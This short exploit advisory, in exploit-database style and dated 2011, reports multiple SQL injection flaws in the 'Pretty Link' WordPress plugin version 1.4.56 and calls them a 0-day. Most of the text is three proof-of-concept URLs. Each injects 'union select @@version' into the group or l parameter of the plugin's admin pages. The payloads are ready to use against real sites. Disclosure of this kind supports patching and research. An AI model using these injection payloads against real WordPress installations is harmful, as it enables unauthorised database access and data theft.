# Exploit Title: 'Pretty Link Like' WordPress Plugin 1.4.56 Multiple SQL Injection # Google Dork: N/A # Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoin) # Date: 27/06/2011 # Software Link: http://wordpress.org/extend/plugins/pretty-link/ # Version: 1.4.56 (not tested on previous versions) # Tested on: WhatEver OS # CVE : 0-Day PoC 1 : http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union select @@version PoC 2 : http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union select @@version PoC 3 : http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union select @@version